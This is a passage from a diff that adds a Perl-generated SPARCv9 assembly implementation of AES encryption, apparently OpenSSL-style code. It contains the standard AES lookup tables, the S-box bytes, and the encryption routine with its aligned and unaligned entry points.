+	0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d,
+	0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f,
+	0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e,
+	0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb,
+	0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce,
+	0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497,
+	0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c,
+	0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed,
+	0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b,
+	0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a,
+	0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16,
+	0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594,
+	0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81,
+	0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3,
+	0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a,
+	0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504,
+	0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163,
+	0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d,
+	0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f,
+	0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739,
+	0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47,
+	0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395,
+	0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f,
+	0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883,
+	0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c,
+	0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76,
+	0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e,
+	0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4,
+	0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6,
+	0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b,
+	0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7,
+	0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0,
+	0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25,
+	0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818,
+	0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72,
+	0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651,
+	0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21,
+	0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85,
+	0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa,
+	0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12,
+	0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0,
+	0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9,
+	0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133,
+	0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7,
+	0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920,
+	0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a,
+	0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17,
+	0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8,
+	0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11,
+	0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a);
+$code.=<<___;
+	.byte	0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
+	.byte	0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
+	.byte	0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
+	.byte	0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
+	.byte	0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
+	.byte	0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
+	.byte	0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
+	.byte	0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
+	.byte	0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
+	.byte	0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
+	.byte	0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
+	.byte	0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
+	.byte	0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
+	.byte	0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
+	.byte	0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
+	.byte	0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
+	.byte	0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
+	.byte	0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
+	.byte	0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
+	.byte	0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
+	.byte	0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
+	.byte	0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
+	.byte	0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
+	.byte	0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
+	.byte	0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
+	.byte	0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
+	.byte	0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
+	.byte	0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
+	.byte	0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
+	.byte	0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
+	.byte	0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
+	.byte	0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
+.type	AES_Te,#object
+.size	AES_Te,(.-AES_Te)
+
+.align	64
+.skip	16
+_sparcv9_AES_encrypt:
+	save	%sp,-$frame-$locals,%sp
+	stx	%i7,[%sp+$bias+$frame+0]	! off-load return address
+	ld	[$key+240],$rounds
+	ld	[$key+0],$t0
+	ld	[$key+4],$t1			!
+	ld	[$key+8],$t2
+	srl	$rounds,1,$rounds
+	xor	$t0,$s0,$s0
+	ld	[$key+12],$t3
+	srl	$s0,21,$acc0
+	xor	$t1,$s1,$s1
+	ld	[$key+16],$t0
+	srl	$s1,13,$acc1			!
+	xor	$t2,$s2,$s2
+	ld	[$key+20],$t1
+	xor	$t3,$s3,$s3
+	ld	[$key+24],$t2
+	and	$acc0,2040,$acc0
+	ld	[$key+28],$t3
+	nop
+.Lenc_loop:
+	srl	$s2,5,$acc2			!
+	and	$acc1,2040,$acc1
+	ldx	[$tbl+$acc0],$acc0
+	sll	$s3,3,$acc3
+	and	$acc2,2040,$acc2
+	ldx	[$tbl+$acc1],$acc1
+	srl	$s1,21,$acc4
+	and	$acc3,2040,$acc3
+	ldx	[$tbl+$acc2],$acc2		!
+	srl	$s2,13,$acc5
+	and	$acc4,2040,$acc4
+	ldx	[$tbl+$acc3],$acc3
+	srl	$s3,5,$acc6
+	and	$acc5,2040,$acc5
+	ldx	[$tbl+$acc4],$acc4
+	fmovs	%f0,%f0
+	sll	$s0,3,$acc7			!
+	and	$acc6,2040,$acc6
+	ldx	[$tbl+$acc5],$acc5
+	srl	$s2,21,$acc8
+	and	$acc7,2040,$acc7
+	ldx	[$tbl+$acc6],$acc6
+	srl	$s3,13,$acc9
+	and	$acc8,2040,$acc8
+	ldx	[$tbl+$acc7],$acc7		!
+	srl	$s0,5,$acc10
+	and	$acc9,2040,$acc9
+	ldx	[$tbl+$acc8],$acc8
+	sll	$s1,3,$acc11
+	and	$acc10,2040,$acc10
+	ldx	[$tbl+$acc9],$acc9
+	fmovs	%f0,%f0
+	srl	$s3,21,$acc12			!
+	and	$acc11,2040,$acc11
+	ldx	[$tbl+$acc10],$acc10
+	srl	$s0,13,$acc13
+	and	$acc12,2040,$acc12
+	ldx	[$tbl+$acc11],$acc11
+	srl	$s1,5,$acc14
+	and	$acc13,2040,$acc13
+	ldx	[$tbl+$acc12],$acc12		!
+	sll	$s2,3,$acc15
+	and	$acc14,2040,$acc14
+	ldx	[$tbl+$acc13],$acc13
+	and	$acc15,2040,$acc15
+	add	$key,32,$key
+	ldx	[$tbl+$acc14],$acc14
+	fmovs	%f0,%f0
+	subcc	$rounds,1,$rounds		!
+	ldx	[$tbl+$acc15],$acc15
+	bz,a,pn	%icc,.Lenc_last
+	add	$tbl,2048,$rounds
+
+		srlx	$acc1,8,$acc1
+		xor	$acc0,$t0,$t0
+	ld	[$key+0],$s0
+	fmovs	%f0,%f0
+		srlx	$acc2,16,$acc2		!
+		xor	$acc1,$t0,$t0
+	ld	[$key+4],$s1
+		srlx	$acc3,24,$acc3
+		xor	$acc2,$t0,$t0
+	ld	[$key+8],$s2
+		srlx	$acc5,8,$acc5
+		xor	$acc3,$t0,$t0
+	ld	[$key+12],$s3			!
+		srlx	$acc6,16,$acc6
+		xor	$acc4,$t1,$t1
+	fmovs	%f0,%f0
+		srlx	$acc7,24,$acc7
+		xor	$acc5,$t1,$t1
+		srlx	$acc9,8,$acc9
+		xor	$acc6,$t1,$t1
+		srlx	$acc10,16,$acc10	!
+		xor	$acc7,$t1,$t1
+		srlx	$acc11,24,$acc11
+		xor	$acc8,$t2,$t2
+		srlx	$acc13,8,$acc13
+		xor	$acc9,$t2,$t2
+		srlx	$acc14,16,$acc14
+		xor	$acc10,$t2,$t2
+		srlx	$acc15,24,$acc15	!
+		xor	$acc11,$t2,$t2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$t3,$t3
+	srl	$t0,21,$acc0
+		xor	$acc14,$t3,$t3
+	srl	$t1,13,$acc1
+		xor	$acc15,$t3,$t3
+
+	and	$acc0,2040,$acc0		!
+	srl	$t2,5,$acc2
+	and	$acc1,2040,$acc1
+	ldx	[$tbl+$acc0],$acc0
+	sll	$t3,3,$acc3
+	and	$acc2,2040,$acc2
+	ldx	[$tbl+$acc1],$acc1
+	fmovs	%f0,%f0
+	srl	$t1,21,$acc4			!
+	and	$acc3,2040,$acc3
+	ldx	[$tbl+$acc2],$acc2
+	srl	$t2,13,$acc5
+	and	$acc4,2040,$acc4
+	ldx	[$tbl+$acc3],$acc3
+	srl	$t3,5,$acc6
+	and	$acc5,2040,$acc5
+	ldx	[$tbl+$acc4],$acc4		!
+	sll	$t0,3,$acc7
+	and	$acc6,2040,$acc6
+	ldx	[$tbl+$acc5],$acc5
+	srl	$t2,21,$acc8
+	and	$acc7,2040,$acc7
+	ldx	[$tbl+$acc6],$acc6
+	fmovs	%f0,%f0
+	srl	$t3,13,$acc9			!
+	and	$acc8,2040,$acc8
+	ldx	[$tbl+$acc7],$acc7
+	srl	$t0,5,$acc10
+	and	$acc9,2040,$acc9
+	ldx	[$tbl+$acc8],$acc8
+	sll	$t1,3,$acc11
+	and	$acc10,2040,$acc10
+	ldx	[$tbl+$acc9],$acc9		!
+	srl	$t3,21,$acc12
+	and	$acc11,2040,$acc11
+	ldx	[$tbl+$acc10],$acc10
+	srl	$t0,13,$acc13
+	and	$acc12,2040,$acc12
+	ldx	[$tbl+$acc11],$acc11
+	fmovs	%f0,%f0
+	srl	$t1,5,$acc14			!
+	and	$acc13,2040,$acc13
+	ldx	[$tbl+$acc12],$acc12
+	sll	$t2,3,$acc15
+	and	$acc14,2040,$acc14
+	ldx	[$tbl+$acc13],$acc13
+		srlx	$acc1,8,$acc1
+	and	$acc15,2040,$acc15
+	ldx	[$tbl+$acc14],$acc14		!
+
+		srlx	$acc2,16,$acc2
+		xor	$acc0,$s0,$s0
+	ldx	[$tbl+$acc15],$acc15
+		srlx	$acc3,24,$acc3
+		xor	$acc1,$s0,$s0
+	ld	[$key+16],$t0
+	fmovs	%f0,%f0
+		srlx	$acc5,8,$acc5		!
+		xor	$acc2,$s0,$s0
+	ld	[$key+20],$t1
+		srlx	$acc6,16,$acc6
+		xor	$acc3,$s0,$s0
+	ld	[$key+24],$t2
+		srlx	$acc7,24,$acc7
+		xor	$acc4,$s1,$s1
+	ld	[$key+28],$t3			!
+		srlx	$acc9,8,$acc9
+		xor	$acc5,$s1,$s1
+	ldx	[$tbl+2048+0],%g0		! prefetch te4
+		srlx	$acc10,16,$acc10
+		xor	$acc6,$s1,$s1
+	ldx	[$tbl+2048+32],%g0		! prefetch te4
+		srlx	$acc11,24,$acc11
+		xor	$acc7,$s1,$s1
+	ldx	[$tbl+2048+64],%g0		! prefetch te4
+		srlx	$acc13,8,$acc13
+		xor	$acc8,$s2,$s2
+	ldx	[$tbl+2048+96],%g0		! prefetch te4
+		srlx	$acc14,16,$acc14	!
+		xor	$acc9,$s2,$s2
+	ldx	[$tbl+2048+128],%g0		! prefetch te4
+		srlx	$acc15,24,$acc15
+		xor	$acc10,$s2,$s2
+	ldx	[$tbl+2048+160],%g0		! prefetch te4
+	srl	$s0,21,$acc0
+		xor	$acc11,$s2,$s2
+	ldx	[$tbl+2048+192],%g0		! prefetch te4
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$s3,$s3
+	ldx	[$tbl+2048+224],%g0		! prefetch te4
+	srl	$s1,13,$acc1			!
+		xor	$acc14,$s3,$s3
+		xor	$acc15,$s3,$s3
+	ba	.Lenc_loop
+	and	$acc0,2040,$acc0
+
+.align	32
+.Lenc_last:
+		srlx	$acc1,8,$acc1		!
+		xor	$acc0,$t0,$t0
+	ld	[$key+0],$s0
+		srlx	$acc2,16,$acc2
+		xor	$acc1,$t0,$t0
+	ld	[$key+4],$s1
+		srlx	$acc3,24,$acc3
+		xor	$acc2,$t0,$t0
+	ld	[$key+8],$s2			!
+		srlx	$acc5,8,$acc5
+		xor	$acc3,$t0,$t0
+	ld	[$key+12],$s3
+		srlx	$acc6,16,$acc6
+		xor	$acc4,$t1,$t1
+		srlx	$acc7,24,$acc7
+		xor	$acc5,$t1,$t1
+		srlx	$acc9,8,$acc9		!
+		xor	$acc6,$t1,$t1
+		srlx	$acc10,16,$acc10
+		xor	$acc7,$t1,$t1
+		srlx	$acc11,24,$acc11
+		xor	$acc8,$t2,$t2
+		srlx	$acc13,8,$acc13
+		xor	$acc9,$t2,$t2
+		srlx	$acc14,16,$acc14	!
+		xor	$acc10,$t2,$t2
+		srlx	$acc15,24,$acc15
+		xor	$acc11,$t2,$t2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$t3,$t3
+	srl	$t0,24,$acc0
+		xor	$acc14,$t3,$t3
+	srl	$t1,16,$acc1			!
+		xor	$acc15,$t3,$t3
+
+	srl	$t2,8,$acc2
+	and	$acc1,255,$acc1
+	ldub	[$rounds+$acc0],$acc0
+	srl	$t1,24,$acc4
+	and	$acc2,255,$acc2
+	ldub	[$rounds+$acc1],$acc1
+	srl	$t2,16,$acc5			!
+	and	$t3,255,$acc3
+	ldub	[$rounds+$acc2],$acc2
+	ldub	[$rounds+$acc3],$acc3
+	srl	$t3,8,$acc6
+	and	$acc5,255,$acc5
+	ldub	[$rounds+$acc4],$acc4
+	fmovs	%f0,%f0
+	srl	$t2,24,$acc8			!
+	and	$acc6,255,$acc6
+	ldub	[$rounds+$acc5],$acc5
+	srl	$t3,16,$acc9
+	and	$t0,255,$acc7
+	ldub	[$rounds+$acc6],$acc6
+	ldub	[$rounds+$acc7],$acc7
+	fmovs	%f0,%f0
+	srl	$t0,8,$acc10			!
+	and	$acc9,255,$acc9
+	ldub	[$rounds+$acc8],$acc8
+	srl	$t3,24,$acc12
+	and	$acc10,255,$acc10
+	ldub	[$rounds+$acc9],$acc9
+	srl	$t0,16,$acc13
+	and	$t1,255,$acc11
+	ldub	[$rounds+$acc10],$acc10		!
+	srl	$t1,8,$acc14
+	and	$acc13,255,$acc13
+	ldub	[$rounds+$acc11],$acc11
+	ldub	[$rounds+$acc12],$acc12
+	and	$acc14,255,$acc14
+	ldub	[$rounds+$acc13],$acc13
+	and	$t2,255,$acc15
+	ldub	[$rounds+$acc14],$acc14		!
+
+		sll	$acc0,24,$acc0
+		xor	$acc3,$s0,$s0
+	ldub	[$rounds+$acc15],$acc15
+		sll	$acc1,16,$acc1
+		xor	$acc0,$s0,$s0
+	ldx	[%sp+$bias+$frame+0],%i7	! restore return address
+	fmovs	%f0,%f0
+		sll	$acc2,8,$acc2		!
+		xor	$acc1,$s0,$s0
+		sll	$acc4,24,$acc4
+		xor	$acc2,$s0,$s0
+		sll	$acc5,16,$acc5
+		xor	$acc7,$s1,$s1
+		sll	$acc6,8,$acc6
+		xor	$acc4,$s1,$s1
+		sll	$acc8,24,$acc8		!
+		xor	$acc5,$s1,$s1
+		sll	$acc9,16,$acc9
+		xor	$acc11,$s2,$s2
+		sll	$acc10,8,$acc10
+		xor	$acc6,$s1,$s1
+		sll	$acc12,24,$acc12
+		xor	$acc8,$s2,$s2
+		sll	$acc13,16,$acc13	!
+		xor	$acc9,$s2,$s2
+		sll	$acc14,8,$acc14
+		xor	$acc10,$s2,$s2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$s3,$s3
+		xor	$acc14,$s3,$s3
+		xor	$acc15,$s3,$s3
+
+	ret
+	restore
+.type	_sparcv9_AES_encrypt,#function
+.size	_sparcv9_AES_encrypt,(.-_sparcv9_AES_encrypt)
+
+.align	32
+.globl	AES_encrypt
+AES_encrypt:
+	or	%o0,%o1,%g1
+	andcc	%g1,3,%g0
+	bnz,pn	%xcc,.Lunaligned_enc
+	save	%sp,-$frame,%sp
+
+	ld	[%i0+0],%o0
+	ld	[%i0+4],%o1
+	ld	[%i0+8],%o2
+	ld	[%i0+12],%o3
+
+1:	call	.+8
+	add	%o7,AES_Te-1b,%o4
+	call	_sparcv9_AES_encrypt
+	mov	%i2,%o5
+
+	st	%o0,[%i1+0]
+	st	%o1,[%i1+4]
+	st	%o2,[%i1+8]
+	st	%o3,[%i1+12]
+
+	ret
+	restore
+
+.align	32
+.Lunaligned_enc:
+	ldub	[%i0+0],%l0
+	ldub	[%i0+1],%l1
+	ldub	[%i0+2],%l2
+
+	sll	%l0,24,%l0
+	ldub	[%i0+3],%l3
+	sll	%l1,16,%l1
+	ldub	[%i0+4],%l4
+	sll	%l2,8,%l2
+	or	%l1,%l0,%l0
+	ldub	[%i0+5],%l5
+	sll	%l4,24,%l4
+	or	%l3,%l2,%l2
+	ldub	[%i0+6],%l6
+	sll	%l5,16,%l5
+	or	%l0,%l2,%o0
+	ldub	[%i0+7],%l7
+
+	sll	%l6,8,%l6
+	or	%l5,%l4,%l4
+	ldub	[%i0+8],%l0
+	or	%l7,%l6,%l6
+	ldub	[%i0+9],%l1
+	or	%l4,%l6,%o1
+	ldub	[%i0+10],%l2
+
+	sll	%l0,24,%l0
+	ldub	[%i0+11],%l3
+	sll	%l1,16,%l1
+	ldub	[%i0+12],%l4
+	sll	%l2,8,%l2
+	or	%l1,%l0,%l0
+	ldub	[%i0+13],%l5
+	sll	%l4,24,%l4
+	or	%l3,%l2,%l2
+	ldub	[%i0+14],%l6
+	sll	%l5,16,%l5
+	or	%l0,%l2,%o2
+	ldub	[%i0+15],%l7
+
+	sll	%l6,8,%l6
+	or	%l5,%l4,%l4
+	or	%l7,%l6,%l6
+	or	%l4,%l6,%o3
+
+1:	call	.+8
+	add	%o7,AES_Te-1b,%o4
+	call	_sparcv9_AES_encrypt
+	mov	%i2,%o5
+
+	srl	%o0,24,%l0
+	srl	%o0,16,%l1
+	stb	%l0,[%i1+0]
+	srl	%o0,8,%l2
+	stb	%l1,[%i1+1]
+	stb	%l2,[%i1+2]
+	srl	%o1,24,%l4
+	stb	%o0,[%i1+3]
+
+	srl	%o1,16,%l5
+	stb	%l4,[%i1+4]
+	srl	%o1,8,%l6
+	stb	%l5,[%i1+5]
+	stb	%l6,[%i1+6]
+	srl	%o2,24,%l0
+	stb	%o1,[%i1+7]
+
+	srl	%o2,16,%l1
+	stb	%l0,[%i1+8]
+	srl	%o2,8,%l2
+	stb	%l1,[%i1+9]
+	stb	%l2,[%i1+10]
+	srl	%o3,24,%l4
+	stb	%o2,[%i1+11]
+
+	srl	%o3,16,%l5
+	stb	%l4,[%i1+12]
+	srl	%o3,8,%l6
+	stb	%l5,[%i1+13]
+	stb	%l6,[%i1+14]
+	stb	%o3,[%i1+15]
+
+	ret
+	restore
+.type	AES_encrypt,#function
+.size	AES_encrypt,(.-AES_encrypt)
+
+___
+
+$code.=<<___;
+.align	256
+AES_Td:
+___
+&_data_word(
+	0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96,
+	0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393,
+	0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25,
+	0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f,
+	0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1,
+	0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6,
+	0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da,
+	0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844,
+	0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd,
+	0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4,
+	0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45,
+	0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94,
+	0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7,
+	0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a,
+	0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5,
+	0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c,
+	0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1,
+	0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a,
+	0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75,
+	0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051,
+	0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46,
+	0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff,
+	0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77,
+	0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb,
+	0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000,
+	0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e,
+	0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927,
+	0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a,
+	0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e,
+	0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16,
+	0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d,
+	0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8,
+	0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd,
+	0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34,
+	0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163,
+	0xd731dcca, 0x42638510, 0x13972240, 0x84c61120,
+	0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d,
+	0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0,
+	0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422,
+	0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef,
+	0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36,
+	0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4,
+	0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662,
+	0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5,
+	0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3,
+	0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b,
+	0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8,
+	0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6,
+	0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6,
+	0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0,
+	0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815,
+	0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f,
+	0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df,
+	0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f,
+	0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e,
+	0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713,
+	0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89,
+	0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c,
+	0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf,
+	0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86,
+	0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f,
+	0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541,
+	0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190,
+	0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742);
+$code.=<<___;
+	.byte	0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
+	.byte	0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
+	.byte	0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
+	.byte	0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
+	.byte	0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
+	.byte	0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
+	.byte	0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
+	.byte	0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
+	.byte	0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
+	.byte	0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
+	.byte	0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
+	.byte	0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
+	.byte	0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
+	.byte	0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
+	.byte	0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
+	.byte	0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
+	.byte	0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
+	.byte	0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
+	.byte	0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
+	.byte	0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
+	.byte	0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
+	.byte	0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
+	.byte	0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
+	.byte	0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
+	.byte	0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
+	.byte	0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
+	.byte	0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
+	.byte	0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
+	.byte	0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
